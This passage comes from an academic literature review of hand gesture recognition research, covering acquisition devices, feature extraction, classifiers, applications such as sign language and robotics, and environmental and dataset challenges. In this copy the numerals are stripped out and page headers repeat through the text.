than once when multiple keywords were used. then, papers were excluded for having titles with no relevance to the review questions in general, where titles were scanned and processed by all authors to specify whether the works are pertinent to any chosen subcategory of hand gesture recognition. the next step was screening abstracts of all retrieved documents. all papers were reviewed and evaluated in reference to the research questions, where authors read the abstracts and evaluated whether they can find an answer to any of the core questions of this review, for example some of the papers excluded were discussing the electrical aspect of hand gesture acquisition methods, this process excluded papers out of . full papers of potentially relevant references were selected for further examination. after reading the full papers, poorly organized documents that do not have a clear methodology justification were removed due to lack of validation and weakness of results justification; for example, some of the works excluded did not explain why they chose their approach of acquisition or classification in comparison with all the possible approaches available in the recent technology, or did not explain why their proposed approach performed in the yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table classification of extracted papers. topic sub-topics references count gesture acquisition methods feature extraction hand gesture techniques classification of hand gestures sign language robotics hand gesture recognition applications others environmental surroundings hand gesture recognition challenges training and testing data way they provided. only papers were selected to be included in this paper. overall, the selection was made by the authors based on two criteria; relevance to the research questions, organization and form of writing of the papers studied. classification of the selected paper is demonstrated in table which also shows the number of papers (intersected) included in each class and subclass. papers were relevant to hand gesture techniques, papers were relevant to hand gesture recognition applications, and papers were relevant to hand gesture recognition challenges. results and analysis the procedure of hand gesture recognition is conducted by executing several steps as illustrated in fig. ; image frame acquisition or gesture acquisition is to capture the human hand gesture image by the computer (ananya, anjan kumar & kandarpa kumar, ). this could be done using vision-based recognition where no special gadgets are required, and a web camera or a depth camera is used, furthermore special tools can be utilized such as wired or wireless gloves that detect the movements of the user hand, and motion sensing input devices (kinect from microsoft, leap motion, etc.) that captures the hand gestures and motions. hand tracking process is the ability of the computer to trace the user hand and separate it from the background and from the surrounding objects (ananya, anjan kumar & kandarpa kumar, ). this can be done using multi-scale color feature hierarchies that gives the users hand and the background different shades of colors to be able to identify and remove the background, or by using clustering algorithms that are capable of treating each finger as a cluster and removing the empty spaces in-between them. the features extracted change from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (ananya, anjan kumar & kandarpa kumar, ). these features and other features can be extracted using several methods available, such as fourier descriptor method which captures the palm, the fingers and the finger tips, or centroid method which captures the essential structure of the hand. the features extracted are then sent to training and testing the classification algorithm (such as artificial neural networks (ann), k-nearest neighbor (knn), naive bayes (nb), yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the basic steps of hand gesture recognition. full-size doi: . /peerjcs. /fig- support vector machine (svm), etc.) to reach the output gesture, for example the output gesture in a simple case can contain two classes to detect only two gestures such as open and closed hand gestures. in this section, we will be discussing the papers that were extracted in reference to the research questions in details, where fig. demonstrates the results of this review, answering each research question by showing the most popular method used in each subcategory. hand gesture recognition techniques the focus of our review in this section is on different gesture acquisition methods that has been used, the features considered for different applications and the feature extraction methods applied on the images to abstract those features, and finally the classification algorithms that has been recently used for classifying hand gestures. gesture acquisition methods image hand gesture acquisition, as illustrated in fig. from microsoft ( ) is to capture the human hand gesture image by the computer (ananya, anjan kumar & kandarpa kumar, ). this could be done using vision-based recognition where no special gadgets are required and a web camera or a depth camera is used, furthermore special tools can be utilized such as wired or wireless gloves that detect the movements of the user hand, and motion sensing input devices (kinect from microsoft, leap motion, etc.) that capture the hand gestures and motions as showed in fig. . several methods for hand gestures acquisition were discussed in the work studied using different acquisition tools, part of them used images that were captured in real time and others used previous images that were recorded in databases. another classification to be considered is the nature of the acquisition which can be either a static hand gesture recognition where the gestures are represented by a constant image, or a dynamic hand gesture recognition were gestures are represented by the movement of the hand. the first method is using vision-based hand gesture recognition to extract images which was proposed by weiguo et al. ( ), ananyaa et al. ( ), alvi, fatema & mohammad ( ), shome ( ). where in weiguo et al. ( ) it was built in a real-time system. in oinam et al. ( ) the authors implemented two different techniques of vision-based hand gesture recognition and one data glove-based technique. the vision-based techniques are static hand and real-time hand gesture recognition techniques. in data glove-based yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results. each research question is illustrated in this figure, along with the suggested subcate- gories and the most common technique or problem resulting in them. full-size doi: . /peerjcs. /fig- figure example of hand gesture recognition using kinect gestures (microsoft, ). full-size doi: . /peerjcs. /fig- technique the glove had five flex sensors. results showed that the vision-based technique was more stable and reliable compared to the data glove-based technique. hand gestures are obtained by evaluating the contour captured from the image segmentation using a glove worn by the speaker in rosalina et al. ( ). also, in danling, yuanlong & huaping ( ) they used a novel data glove called yobu to collect data for gesture recognition. the work in gunawardane & nimali ( ) compared using a data glove to track the motion of the human hand using flex sensors, gyroscopes and vision data with leap motion yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. controller. results showed that the leap motion controller had a high repeatability and high potential for soft finger type applications. furthermore, in eko, surya & rafiidha ( ), shaun et al. ( ) and deepali & milind ( ) the gestures are also captured using leap motion controller. in siji rani, dhrisya & ahalyadas ( ) they used a new hand gesture control in augmented reality system (hgcars) where the gesture recognition is performed using a secondary camera and the reality is captured using an ip camera, the virtual object is added to the video feed obtained from an ip camera and controlled by using the position and depth of hand, measured using a webcam. moreover, the authors of salunke & bharkad ( ), rokhsana et al. ( ), jessie et al. ( ) and anshal, heidy & emmanuel ( ) used webcams for gathering input data. in aditya et al. ( ), a hand gesture recognition on top-view hand images observed by a time of flight (tof) camera in a car for touchless interactions inside a car was proposed. the help of image capturing devices installed on computer was implemented in nilima & patil ( ). the authors of hafız et al. ( ) presented a cmswvhg (control ms windows via hand gesture) to perform numerous windows actions using hand gestures using internal or external camera for taking input with the help of opencv. to control os on the projected screen for a virtual mouse system without any hardware requirement one camera source was required (rishabh et al., ). also, data acquisition was done using camera interfacing in ashish & aarti ( a) and ashish & aarti ( b). to detect static hand gesture rgb cameras and depth data were used by rytis & arunas ( ) and chenyang, xin & lianwen ( ), whereas in chenyang, xin & lianwen ( ) they tested their approach on sheffield kinect gesture (skig). a static hand gesture recognition using kinect depth sensor to capture color, and infrared and depth frames was applied by fuchang & hijian ( ), xiang, lei & qiang ( ), jozef & slavomír ( ), sih-huei et al. ( ) and yiwen et al. ( ). moreover, the authors proposed a kinect based real time dynamic hand gesture recognition technique in atharva & apurv ( ), devendrakumar & kakade ( ) and karthik et al. ( ). a real time wearable hand gesture recognition system, which decoded the information from surface electromyography (semg) was proposed in jian et al. ( ), jinxing, jianhong & jun ( ), david & donghan ( ), kuang-yow et al. ( ), jakub, tomasz & piotr ( ), shunzhan et al. ( ) and andrés & marco ( ). also, a real time system based on the emg with the surface electromyography measured by the commercial sensor myo which is an armband placed on the forearm was proposed by marco et al. ( a), marco et al. ( b), karthik et al. ( ) and stefano et al. ( ). in yuhui, shuo & peter ( ), yuta et al. ( ), donq-liang & wei-shiuan ( ), ananta & piyanuch ( ) and nabeel, rosa & chan ( ) a sensor-based wearable wristband was presented for static hand gestures. the authors in hari et al. ( ) and erhan, hakan & baran ( ) presented making use of the sensors in smartphones. the authors of yifan et al. ( ) used wearable devices such as vr/ar helmet and glasses in a gesture recognition system. a doppler radar sensor with dual receiving channels was used to acquire a big database of hand gestures signals in jiajun & zhiguo ( ). a yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gesture recognition system for human–computer interaction based on ghz radars in shengchang et al. ( ) and . -ghz continuous radar in takuya et al. ( ) were used. moreover, an interface based on a mechanomyography (mmg) signal to capture arm movement and hand gesture was applied in yuntao et al. ( ) and piotr, tomasz & jakub ( ). the work of ibrahim et al. ( ) proposed a hand gesture system using two monopole antennas to measure signatures at different locations, and the work of zengshan et al. ( ) developed a wireless sensing wicatch, where the motion locus of the gesture is developed by constructing virtual antenna array based on signal samples. feature extraction hand tracking process is the ability of the computer to trace the user hand and separate it from the background and from the surrounding objects (ananya, anjan kumar & kandarpa kumar, ). this can be done using multi-scale color feature hierarchies that gives the users hand and the background different shades of colors to be able to identify and remove the background, or by using clustering algorithms that are capable of treating each finger as a cluster and removing the empty spaces in-between them. in this subsection, we will be discussing the different features used by the different applications implemented in the reviewed work. furthermore, the feature extraction methods used will also be discussed. feature extraction methods. feature extraction methods are used in order to extract the useful information from the images that helps in the recognition process of gestures. these features can be extracted using several methods available, such as fourier descriptor method which captures the palm, the fingers and the finger tips, or centroid method which captures the essential structure of the hand. the work of haitham, alaa & sabah ( ) applied two methods of feature extraction, a contour hand and complex alhzat. in weiguo et al. ( ) feature extraction module was applied using discrete fourier transform (dft) operations of histograms (vertical and horizontal). the proposed approach of salunke & bharkad ( ) took the input data from a portable webcam then processed the images and after that extracted a histogram of gradients features. the objective of himadri et al. ( ) was to do segmentation of the hands using polygon approximation and approximate convex decomposition, then record the unique features between various convex segments of the hand as a method of feature extraction. regional contrast (rc) based salient object extraction algorithm, and a method using the color statistics of image were used in qingrui et al. ( ). to detect the start and end points of gestures a gesture spotting algorithm was applied in hari et al. ( ). experiments of chenyang, yingli & matt ( ) followed five different feature extraction strategies; depth image sequence, body joints & facial landmarks, hand shapes & facial expressions/attributes. in jose et al. ( ), digital image processing techniques were used to eliminate noise, to improve the contrast under different illumination, to separate the hand from the background and to cut the region containing the hand. yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. histogram of oriented gradients (hog) was used in vimonhak, aranya & somsak ( ) for image processing to extract characteristics of the hand. in the work of nilimas , the accurate end point identification method was implemented and applied on gesture images which were captured in varying backgrounds to detect edge points and branch points and it was also applied on blurred images containing multiple objects. the authors of isack, zhongfu & jamal ( ) employed higher order local autocorrelation (hlac) feature extraction method. the authors of xi, chen & lihua ( ) proposed using wavelet invariant moments, the hand region was separated based on the depth information, and the wavelet feature was calculated by enforcing the wavelet invariant moments of the hand region, and the distance feature was extracted by calculating the distance from fingers to hand centroid. feature extraction like time, frequency and time-frequency were used in jiajun & zhiguo ( ) and andrés & marco ( ). authors of chenyang, xin & lianwen ( ) used a robust feature, path signature (ps) and its compressed version, log path signature (lps) to extract effective features of hand gestures. discrete wavelet transformation and singular value decomposition were used for features extraction, a genetic algorithm with effective fitness function was used to select optimal features by eliminating redundant and irrelevant features for improving the recognition performance of the system in rasel et al. ( ). in rania, mohammed & mahmoud ( ) system for hgr that is based on dimensionality reducing the histogram of oriented gradients feature vectors by applying principal component analysis was implemented. a hand gesture recognition method based on salient feature point selection was proposed in yiwen et al. ( ), the shape feature of hand gesture was extracted from the contour, and the salient feature points were selected by a new algorithm to represent the hand gesture. in experiments of vivek, ramesh & kagalkar ( ) image processing techniques like outline investigating based on edge recognition, wavelet change, disintegration, widening, obscure disposal, and commotion end were used, they also used histogram orientation gradient called hog for shape highlight extraction and most vital part investigation for list of capabilities streamlining and diminishment. they also used a polygonal shape approximation strategy with a special chain-coding for shape-similarity matching in oyndrila et al. ( ). in vladislava, predrag & goran ( ) recognition was for hand gestures, images were captured on two different backgrounds and with several space orientations, and histogram of oriented gradients method was applied for feature extraction. the gaussian mixture models (gmm) based on human skin pixels and tracks segmented foreground using optical flow to detect hand swipe direction was proposed in srinidhi et al. ( ). authors of ananta & piyanuch ( ) employed daubechies wavelet transforms for feature extraction. in rajeshree & jayashree ( ) they proposed a new method to find flow of hand for special signs using chain code, and recognition technique of signs (dynamic digits) that is independent of size and color of hand using binary images. in ashish & aarti ( a) and ashish & aarti ( b) feature extraction was done using blob detection and contour extraction. in jessie et al. ( ) image processing techniques such as: color segmentation, visual-hand tracking, pre-processing, and feature extraction were used. yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in ashish & aarti ( a) and ashish & aarti ( b) features were extracted using color jiltering and skin segmentation, convexity hull algorithm was implemented just for finger point detection and number recognition. where in lalit & pritee ( ), an acquisition module that spots the legitimate gesture trajectory by implementing pen-up and pen-down actions using depth thresholding and velocity tracking was proposed, the extracted trajectory is recognized using the equipolar signature (eps) technique. conventional method was used in devendrakumar & kakade ( ) to utilize separation of hand from surrounding environment and then find palm points. each hand part in shome ( ) was modeled as a convex hull and pairwise distance between the parts was calculated using gjk-epa algorithm. principal component analysis (pca) was used in marlon, alistair & mohamed ( ) to reduce the dimensionality and extract features of images of the human hand. the work in anshal, heidy & emmanuel ( ) processed the hand gesture image by combining image segmentation and edge detection to extract morphological information, and frames were processed using the multi-modality technique used for processing individual characters. in vedha viyas et al. ( ) to improve recognition rate of hand gestures, various image processing techniques were used such as histogram equalization, median filtering, average filtering, and morphological filtering, feature extraction image matching was done using cross-correlation co-efficient. the proposed techniques in riya et al. ( ) relied on multiple representations namely hog, gist and bsif, they used feature fusion which is the process of combining two feature vectors to obtain a single feature vector. extraction of a series of features based on convex defect detection a model was proposed in soukaina et al. ( ), taking advantage of the close relationship of convex defect and fingertips. features extracted. the features extracted change from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (ananya, anjan kumar & kandarpa kumar, ). there are several features that could be considered and extracted from the hand gestures which are highly dependent on the application. skin color feature was used in weiguo et al. ( ), xiang, lei & qiang ( ), rokhsana et al. ( ). hand gestures in himadri et al. ( ) were represented by hand shapes, orientations and movement of the hands, alignments of the fingers, and the palm position. in david & donghan ( ) open hand, wrist radial deviation, ulnar deviation, wrist extension, wrist flexion, and closed fist were considered. scale, rotation, translation, illumination, noise and background were extracted in the work of jose et al. ( ). in yuta et al. ( ) finger movements were observed because the muscles and bones on the back of the hand are linked to the fingers, also skin deformation was measured by the distance between the device and skin with sensors. the classifier in piotr, tomasz & jakub ( ) had five gestures (fist, pronation, supination, flexion, extension) and the feature vector consisted of features: five representing muscle activity (rms) and parameters corresponding to relative sensor orientation. a feature vector which was composed of wavelet invariant moments and yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. distance feature was generated by the work of xi, chen & lihua ( ). the authors of shunzhan et al. ( ) extract five eigenvalues in the time domain. geometric features such as area and centroid were extracted from each video frame to capture the trajectory of the moving hand and compare it with the training gestures in the experiments of atharva & apurv ( ). the features used in gunawardane & nimali ( ) were: position, orientation, velocity and acceleration, bending angle of the fingers. to represent the global movement of hand skeleton the global motion features were extracted by xinghao et al. ( ). in experiments of sih-huei et al. ( ) the hand region is recognized by using information about the skeleton of the segmented depth images, then a histogram of the oriented normal d (hon d) and a histogram of oriented gradient (hog) were extracted to represent the motion patterns. for each hand gesture type, occlusion, light, shadow and background were considered as features in biyao et al. ( ), whereas the work of anna, sung & jae-gon ( ) presented a detection method that utilizes depth image obtained by incoming stereo image sequences and skin color information in a combined way, then a detected hand contours based on bezier curve to provide an interoperable interface between a detection module and a recognition module was also presented, and a set of hand gestures with a combination of open fingers and rotational angles were used for the hand gesture recognition of their system. the proposed system (oyndrila et al., ) identified hand-palm in video stream based on skin color and background subtraction scheme. where in rishabh et al. ( ) glove tracking was done and then fingertips were detected with respect to centroid of the hand. features used in ashish & aarti ( a) and ashish & aarti ( b) were orientation, centre of mass centroid, fingers status, thumb in positions of raised or folded fingers of hand. on the other hand, features extracted in soumya & muzameel ( ) were size, shape, color or texture. flexion, extension, abduction and grasp of forearm muscles features were used to detect four different movements of the wrist (stefano et al., ). the features had to be able to characterize gestures, and invariant under translation and rotation of hand gesture to ensure reliable recognition in soukaina et al. ( ). classification of hand gestures the features extracted are sent to training and testing the classification algorithm (such as artificial neural networks (ann), k-nearest neighbor (knn), naive bayes (nb), support vector machine (svm), etc.) to reach the output gesture, for example the output gesture in a simple case can contain two classes to detect only two gestures such as open and closed hand gestures, or in sign language as shown in fig. . the classification of the information extracted from the images of hand gestures is required to be able to recognize these gestures by the computer, there are several classification algorithms that can be used for this purpose. the work of haitham, alaa & sabah ( ), weiguo et al. ( ), rosalina et al. ( ), jakub, tomasz & piotr ( ), piotr, tomasz & jakub ( ), shunzhan et al. ( ), yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. erhan, hakan & baran ( ), vladislava, predrag & goran ( ), deepali & milind ( ) and ananta & piyanuch ( ) proposed using artificial neural networks (ann) for classification, whereas in jakub, tomasz & piotr ( ) and piotr, tomasz & jakub ( ) softmax output layer was used with feedforward ann; in shunzhan et al. ( ), erhan, hakan & baran ( ), alvi, fatema & mohammad ( ), vladislava, predrag & goran ( ); deepali & milind ( ) and ananta & piyanuch ( ) backpropagation training methods were used, and the authors in jessie et al. ( ) used kohonen self- organizing maps as a type of ann to classify data sets in unsupervised manner to convert hand gestures into filipino words. in chun-jen et al. ( ), a synthetically-trained neural network was used for d hand gesture identification. the training process of a deep-learning neural network required a large amount of training data. the authors of chenyang, xin & lianwen ( ) proposed using the lpsnet, an end-to-end deep neural network for hand gesture recognition with novel log path signature features. in yifan et al. ( ) and biyao et al. ( ) they proposed using deep neural networks for classification. the authors in sungho & wonyong ( ) came up with two dynamic hand gesture recognition techniques using low complexity recurrent neural network (rnn) algorithms for wearable devices, the first was based on video signal and uses convolutional neural network (cnn) with rnn for classification, and the other used accelerometer data and applied rnn for classification. in contrast, xinghao et al. ( ) used a bidirectional recurrent neural network (rnn) with the skeleton sequence to augment the motion features for rnn were used. deep convolutional neural network was used for classification in ibrahim et al. ( ), david & donghan ( ), javier, paula & robinson ( ), jose et al. ( ), aditya et al. ( ), yuntao et al. ( ), peijun et al. ( ), jozef & slavomír ( ), jiajun & zhiguo ( ), takuya et al. ( ) and fabian et al. ( ), where in aditya et al. ( ) the authors aimed to improve the detection of hand-gestures by correcting the probability estimate of a long-short-term memory (lstm) network by pose prediction performed by a convolutional neural network (cnn). they used principal component analysis (pca) as a training procedure to reduce the labelled data of hand pose classification to perfect the initialization of weights for the cnn. the authors in fuchang & hijian ( ), salunke & bharkad ( ) and marlon, alistair & mohamed ( ) used k-nearest neighbor (knn) classifier to recognize hand gestures. the work presented in kuang-yow et al. ( ) classified the recognition using k-nearest neighbor (knn) and decision tree algorithms combination. support vector machine (svm) was used for classification in yuhui, shuo & peter ( ), chenyang, yingli & matt ( ), yuta et al. ( ) xi, chen & lihua ( ), rasel et al. ( ), reshna & jayaraju ( ), zengshan et al. ( ), ashish & aarti ( a), ashish & aarti ( b), zhiwen et al. ( ) and stefano et al. ( ). decision tree was used to classify the gestures in shengchang et al. ( ). to recognize the patterns in jian et al. ( ), they used a modified deep forest algorithm. in shaun et al. ( ) and riya et al. ( ), they used a random regression forest algorithm for classification. yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in jinxing, jianhong & jun ( ) the hand gesture was modeled and decomposed by the use of gaussian mixture model-hidden markov models (gmmhmm), gmms are used as sub-states of hmms to decode semg feature of gesture. moreover, a hand gestures recognition system was implemented using the incorporation of bhattacharyya divergence into bayesian sensing hidden markov models (bs-hmm) in sih-huei et al. ( ). also, in devendrakumar & kakade ( ) hidden markov model was used for classification. the work of hari et al. ( ), atharva & apurv ( ), yiwen et al. ( ) and washef, kunal & soma ( ) presented using the dynamic time warping algorithm for classification. whereas marco et al. ( a) and marco et al. ( b) used the k-nearest neighbor rule together with the dynamic time warping algorithm for classification. naive bayes was applied as the training method for classification of eko, surya & rafiidha ( ). multiple linear discriminant analysis (lda) classifier was adopted to classify different hand gestures in isack, zhongfu & jamal ( ) and yuefeng et al. ( ). classification of digits gesture from to was done using principal component analysis by rajeshree & jayashree ( ). the work (danling, yuanlong & huaping, ) used extreme learning machine (elm) for gesture recognition. the work presented in himadri et al. ( ) used support vector machine (svm), artificial neural network, naive bayes and k-nearest neighbor (k-nn) classifiers as the training methods to recognize the features extracted. in contrast, in ananyaa et al. ( ) the best classification accuracy was achieved using euclidean distance and eigen vector, but this result is for a very small dataset, and the best result was a dataset containing nearly images that used support vector machine for classification of images; also, using artificial neural network provided an accuracy of . %. furthermore, multi-class support vector machine (svm) and k-nearest neighbors (knn) classifiers were used to classify the hand gestures in rania, mohammed & mahmoud ( ), experiments showed that the accuracy of knn classifier were better than svm classifier. in nabeel, rosa & chan ( ) support vector machine (svm), decision tree (dt), k-nearest neighbors (knn), and linear discriminant analysis (lda) were compared in classification performance, and results showed that lda got the highest accuracy. hand gesture recognition applications hand gestures can be used as a natural communication with the computer; with today’s technologies, the number of applications that could apply hand gesture recognition is rapidly increasing. in this section, we will be discussing the most recent applications that were presented in the years to . sign language sign languages, as illustrated in fig. , use manual communication to explain a certain meaning. this can include using hand gestures, movements, fingers orientation to deliver a certain word or meaning. the work of weiguo et al. ( ), chenyang, yingli & matt ( ), rasel et al. ( ), shaun et al. ( ), deepali & milind ( ), nabeel, rosa & chan ( ); and anshal, heidy & emmanuel ( ) proposed using hand gesture recognition for american sign yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. language (asl) for people who are hearing impaired, whereas in shaun et al. ( ) they did not evaluate the letters that are dynamic (like: j and z). in nabeel, rosa & chan ( ) gestures were studied including asl alphabets and asl numbers. in anshal, heidy & emmanuel ( ) two different translation paradigms; english characters (alphabet) and complete words or phrases were proposed. an alternative to talking for deaf & dumb people who have hearing or speech problems using sign language recognition and hand gestures was proposed in himadri et al. ( ), oinam et al. ( ), reshna & jayaraju ( ), vivek, ramesh & kagalkar ( ), oyndrila et al. ( ), ashish & aarti ( a), ashish & aarti ( b) and rishabh et al. ( ). whereas in rosalina et al. ( ) a sign language that consists of the alphabetic from ‘‘a’’ to ‘‘z’’, the numbers from ‘‘ ’’ to ‘‘ ’’, and some additional punctuation marks like ‘‘period’’, ‘‘question mark’’, and ‘‘space’’ using static hand gesture recognition was produced. the work of jose et al. ( ) used the alphabet of sign language of peru (lsp). also, vimonhak, aranya & somsak ( ) proposed a technique for the recognition of lao alphabet sign language for the deaf people. in eko, surya & rafiidha ( ), indonesian sign language system (sibi) was applied for normal people to learn sign language and communicate to people with hearing disability. moreover, in donq-liang & wei-shiuan ( ), the authors used turkish fingerspelling signs. a framework for recognizing sinhala sign language gestures and translating them in to natural language for hearing & speaking impaired people was proposed in vladislava, predrag & goran ( ). the authors of jessie et al. ( ) converted hand gestures into filipino words. the work presented in marlon, alistair & mohamed ( ) used the alphabet of irish sign language. finally, indian sign language (isl) hand gesture recognition system was introduced in riya et al. ( ). robotics hand gestures can also be employed in the process of building robotics, as illustrated in fig. (elecbits, ) which shows the use of a glove to control a robotic vehicle. a recognition frame of continuous hand gestures of upper-limb exoskeleton robot was proposed in jinxing, jianhong & jun ( ). in yuhui, shuo & peter ( ) they had three groups of hand gestures: six wrist gestures, five single finger flexions, and ten chinese number gestures that were built to control a robotic arm. the authors of sungho & wonyong ( ) came up with two dynamic hand gesture recognition techniques using low complexity recurrent neural network (rnn) algorithms for a wearable device. the experiments of xiang, lei & qiang ( ) produced a control system for robotic wheelchair for the aged and the disabled, which contained two parts: gesture interaction and intelligent wheelchair. also, the approach of javier, paula & robinson ( ) allowed the consequent execution of a robotic agent for the delivery of objects. in yuntao et al. ( ) the authors introduced a wearable sensor suite fusing arm motion and hand gesture recognition for operator control of uavs. the authors of yuta et al. ( ) proposed a wearable device with photo-reflective sensors arranged in an array to recognize hand gestures by measuring the skin deformation yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of the use of hand gestures in robotics (elecbits, ). full-size doi: . /peerjcs. /fig- of the back of the hand. also, in danling, yuanlong & huaping ( ) hand gestures recognition was used in human–robot interaction (hri). in experiments of devendrakumar & kakade ( ), continuous trajectory path made by hand over a period of time was considered for real time dynamic gesture recognition purpose using kinect sensor for controlling robotic arm. a hand gesture-based control design was proposed for mobile robots in hang et al. ( ), where mobile robots can move according to the signals encoded by hand gestures. work of vedha viyas et al. ( ) dealt with a robotic arm using hand gestures for many applications such as automation, medical applications and gaming. others a static hand gesture recognition in a real-time human–computer interaction application was proposed in salunke & bharkad ( ) to control the power point presentations from a distance. a human–computer interaction based on hand gesture in a projector-camera system was presented in qingrui et al. ( ). also, real-time hand gesture recognition for flight control of multiple quadrotors was applied in david & donghan ( ). the authors of javier, paula & robinson ( ) presented the design of a convolutional neural network architecture using the matconvnet library in order to achieve the recognition of classes: ‘‘open’’ and ‘‘closed’’ and ‘‘unknown’’. the approach studied in marco et al. ( a) and marco et al. ( b) could be used in multiple applications in medical and engineering fields. the study of aditya et al. ( ) showed hand gesture recognition on top-view hand images observed by a time of flight (tof) camera in a car for touchless interactions inside a car. in peijun et al. ( ) they used seven kinds of hand gestures that can command a consumer electronics device, such as mobile phones and tvs. the authors in siji rani, dhrisya & ahalyadas ( ) proposed an augmented reality (ar) to merge the virtual world into the real world and to enhance the perception of the real world by adding -d virtual objects. yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the experiments of yu et al. ( ) described a method of hand gesture recognition using principle component analysis (pca) implemented in android phone. a real-time hand gesture recognition system was proposed using electromyography (emg) in the field of medicine and engineering, with a higher number of gestures to recognize in marco et al. ( a) and marco et al. ( b). the work of rokhsana et al. ( ) presented a hand gesture-based computer mouse control system. the authors of hafız et al. ( ) presented a cmswvhg (control ms windows via hand gesture) to perform numerous windows actions using hand gestures. the work discussed in anna, sung & jae-gon ( ) presented a method to detect and to recognize hand gestures for generating hand gesture-based commands to control the media consumption in smart glasses. hand gesture recognition or finger angle prediction for ultrasound imaging was proposed in yuefeng et al. ( ). a hand gesture recognition technique on a smartphone using google cardboard (gc) and wearality in phones was applied in srinidhi et al. ( ). a real-time hand gesture recognition technique for presentation was proposed in rishabh et al. ( ), to control os on the projected screen for a virtual mouse system without any hardware requirement. hand-gesture-based commands were proposed in lalit & pritee ( ) to replace touch and electromechanical input panels using vision-based mid-air character input. gesture recognition system was proposed in soumya & muzameel ( ), mudra is an expressive form of gesture that is mainly used in indian classical dance form where the gesture is in visual form to connect with the audience. the authors in zhiwen et al. ( ) presented a real-time hand gesture recognition by using kinect sensor, to control mouse by user hands for operations such as ‘clicking’, ‘dragging’ and ‘dropping’, and engaged/disengaged gestures. gesture recognition in karthik et al. ( ) was used for bio robotics, the paper focused on presenting a sensor based human gesture recognition for the hand cricket game. hand gesture recognition challenges the process of hand gestures recognition consists of a set of complex steps that has many possible difficulties that could stand in the way of having accurate recognition. in this section, we will discuss the major environmental surroundings challenges and the training and testing dataset challenges that could occur. environmental surroundings in fuchang & hijian ( ) the environmental background, light and rotation, translation and scale change proposed a difficulty; the authors used depth data to help in hand separation and to accomplish a synchronized color and depth images in kinect. different light brightness (dull, medium, and bright) conditions were tested in salunke & bharkad ( ) to overcome their problem, the results of the bright light level gave the best accuracy as expected. furthermore, the results of oinam et al. ( ) showed that the vision-based techniques gave an accuracy of % in bright lighting condition with a white background. the work of qingrui et al. ( ) showed that it was difficult to achieve proper accuracy when having complex backgrounds, variable external illumination, and shadows of hand yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gesture. the authors of hari et al. ( ) presented a continuous hand gestures recognition technique using three-axis accelerometer and gyroscope sensors in smartphones, a gesture coding algorithm was also used to reduce the influence of unstableness of the user hand. digital image processing techniques were used in jose et al. ( ) to eliminate noise, to improve the contrast under different illumination, to separate the hand from the background and to cut the region containing the hand, where results of images with complex background got low accuracy. in rytis & arunas ( ) the authors suggested that rgb cameras can be used to detect hand, but it has limited applications because hand detection was hard in some lighting conditions or in different skin colors, using depth camera data was better in distinguishing hands in front of camera. study of peijun et al. ( ) suggested that spatial localization of the hands when it contains background, human face, and human body could be a challenging task, where the results achieved an accuracy of . % in the dataset with simple backgrounds and . % in the dataset with complex backgrounds. the authors of yu et al. ( ) were capable of solving the problems that faced them such as different size of gesture image captured, different angle of gesture’s rotation and flipped gesture. after experiments of atharva & apurv ( ) they found that if there was a larger object than the hand that the kinect captures, wrong results will be achieved. the results of hafız et al. ( ) were highly affected by the background noise where they achieved an accuracy of . %. in experiments of yifan et al. ( ) and to strengthen the recognition accuracy, and as the dataset used contained more than , gesture and , , frames for both color and depth modalities from subjects, they tested different static and dynamic gestures with six diverse indoor and outdoor scenes respectively with variation in background and illumination, they also tested when people perform gestures while they are walking and they achieved an acceptable accuracy. in reshna & jayaraju ( ) the authors used complex backgrounds with respect to the skin color, and results showed a disadvantage in this system which was the lighting conditions. the results of rania, mohammed & mahmoud ( ) showed that the proposed algorithm achieved recognition rate of . % under different hand poses and complex background with changes in lightning, moreover their system was robust to rotation, scale, translation, and lighting. also, the results of yiwen et al. ( ) showed that their method was adjusting to translation, rotation scaling and articulated deformation. time of flight (tof) data was used in fabian et al. ( ) which tends to be overly noisy depending on various factors such as illumination, reflection coefficient and distance that were studied in their research process. the system of washef, kunal & soma ( ) overcame the limitations of a glove-based approach and the vision-based approach concerning different illumination conditions, background complexity and distance from camera. the system in lalit & pritee ( ) was applicable for rotation, scale, and translation variations, directions, and the dataset contained digits, alphabets, and symbols. yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. training and testing data the training and testing data problems can be classified as either having a small set of gestures that are insufficient for recognition training or having a large set of gestures that are imbalanced leading to a low recognition accuracy. the training data of haitham, alaa & sabah ( ) had only images and the results reached an accuracy of . %. in weiguo et al. ( ) they trained their system using static american sign language (asl) and their accuracy reached . %, whereas in fuchang & hijian ( ) they used detailed features to avoid the problem of having imbalanced data and images. to overcome the problem of having more than one meaning and move to represent a gesture the authors of oinam et al. ( ) used vision-based hand gesture recognition 